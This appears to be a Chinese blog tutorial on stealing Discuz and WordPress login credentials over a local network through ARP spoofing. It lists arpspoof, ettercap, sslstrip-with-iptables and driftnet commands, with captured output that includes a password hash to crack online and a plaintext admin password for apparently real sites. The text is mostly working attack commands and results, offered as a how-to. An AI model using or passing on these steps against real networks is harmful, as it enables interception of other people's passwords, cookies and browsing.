如何通过局域网欺诈获取账户密码

如何通过局域网欺诈获取discuz、wordpress账户密码

无论是wordpress、还是discuz这些cms系统

无论是https、还是http都可以获取到账户密码

但是浏览器不能使用隐身模式,不然获取不到(这也是为什么机智的我上网每次都开无痕模式)

相关环境

攻击机:kali linux

ip地址:192.168.47.128

靶机:Debian10

ip地址:192.168.47.129

kali linux开启转发

使用下面命令

echo 1 > /proc/sys/net/ipv4/ip_forward

查看记录

┌──(root 663962)-[/home/q663962]
└─# cat /proc/sys/net/ipv4/ip_forward
1

arpspoof的安装

安装arpspoof

sudo apt-get install dsniff

执行效果

正在读取软件包列表... 完成
正在分析软件包的依赖关系树
正在读取状态信息... 完成
下列软件包是自动安装的并且现在不需要了:
  libplymouth4 libxml-dom-perl libxml-perl libxml-regexp-perl
使用'sudo apt autoremove'来卸载它(它们)。
将会同时安装下列软件:
  libnids1.21
下列【新】软件包将被安装:
  dsniff libnids1.21
升级了 0 个软件包,新安装了 2 个软件包,要卸载 0 个软件包,有 1119 个软件包未被升级。
需要下载 131 kB 的归档。
解压缩后会消耗 497 kB 的额外空间。
您希望继续执行吗? [Y/n] y

arpspoof的使用

使用arpspoof命令

实验需要使用两个窗口

第一个窗口

监听ip地址为192.168.47.129 网关为192.168.47.2 的数据

sudo arpspoof -t 192.168.47.129 192.168.47.2 -i eth0

第二个窗口

ettercap -Tq -i eth0

HTTP浏览器无痕模式

然后在靶机浏览网页输入账户和密码

image-20210223223103190.png

image-20210223223121428.png

image-20210223223014580.png

image-20210223223029151.png

输入完成之后,在攻击机器查看

image-20210223223416245.png

针对discuzX3.4系统http下,使用无痕浏览,只能抓取到用户名,密码、cookies均抓取不到。

HTTP浏览器正常模式

这里尝试使用浏览器正常模式访问

discuz访问测试

image-20210223225214813.png

可以探测到密码

image-20210223225233967.png

效果如下

HTTP : 101.200.203.230:80 -> USER: FancyPig  PASS: e807f1fcf82d132f9bb018ca6738a19f  INFO: http://www.ddgbr.com/
CONTENT: formhash=2c3e04a6&referer=http%3A%2F%2Fwww.ddgbr.com%2F&username=FancyPig&password=e807f1fcf82d132f9bb018ca6738a19f&questionid=0&answer=

然后使用md5解码,有很多这样类似的在线解码网址

https://www.cmd5.com/

本站针对md5、sha1等全球通用公开的加密算法进行反向查询,通过穷举字符组合的方式,创建了明文密文对应查询数据库,创建的记录约90万亿条,占用硬盘超过500TB,查询成功率95%以上,很多复杂密文只有本站才可查询。自2006年已稳定运行十余年,国内外享有盛誉。

image-20210223230156728.png

wordpress访问测试

image-20210223231330348.png

image-20210223231355287.png

可以探测到wordpress的密码

image-20210223231431812.png

DHCP: [00:0C:29:91:86:C3] REQUEST 192.168.47.128
DHCP: [192.168.47.254] ACK : 192.168.47.128 255.255.255.0 GW 192.168.47.2 DNS 192.168.47.2 "localdomain"
HTTP : 39.106.66.45:80 -> USER: admin  PASS: youcanreallydance  INFO: http://wp.iculture.cc/wp-login.php?redirect_to=http://wp.iculture.cc/wp-admin/&reauth=1
CONTENT: log=admin&pwd=youcanreallydance&wp-submit=%E7%99%BB%E5%BD%95&redirect_to=http%3A%2F%2Fwp.iculture.cc%2Fwp-admin%2F&testcookie=1

这里wordpress的密码甚至直接就显示出来了

HTTPS浏览器正常模式

推荐阅读:Kali安装sslstrip以及踩坑分享

  Kali安装sslstrip以及踩坑分享  这里需要安装sslstrip3,相关详情点击阅读

相关命令

清除类型为nat的iptables

echo 1 > /proc/sys/net/ipv4/ip_forward iptalbes -t nat -F

端口转发,10000为sslstrip的监听端口

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

查看iptables列表是否生效

sslstrip -l 10000
iptables -t nat -L

image-20210224123256073.png

监听ip地址为192.168.47.129 网关为192.168.47.2 的数据

sudo arpspoof -t 192.168.47.129 192.168.47.2 -i eth0

另一个窗口里

ettercap -Tq -i eth0

某些浏览器里是可以的,我测试的firefox貌似检测不到,当然也有可能是因为目前很多网站开启了HSTS的原因,这个时候需要配合到其他的工具才可以。

配合driftnet

配合driftnet模块可以嗅探到流量中的图片

安装driftnet

apt-get install driftnet

使用图片嗅探功能

driftnet -i eth0

还可以监测到别人访问页面时候浏览的图片

靶机访问页面

image-20210223232059259.png

攻击机这边显示

image-20210223232147358.png

单击一下即可保存

image-20210223232221791.png

点一下可以保存至桌面

常见问题

网上很多说是如果使用的是NAT模式,出现以下报错,要用桥接模式,其实是错的。

真正原因是没有输入sudo

arpspoof: libnet_open_link(): UID/EUID 0 or capability CAP_NET_RAW required
© 版权声明
THE END
喜欢就支持一下吧
点赞10 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片

    暂无评论内容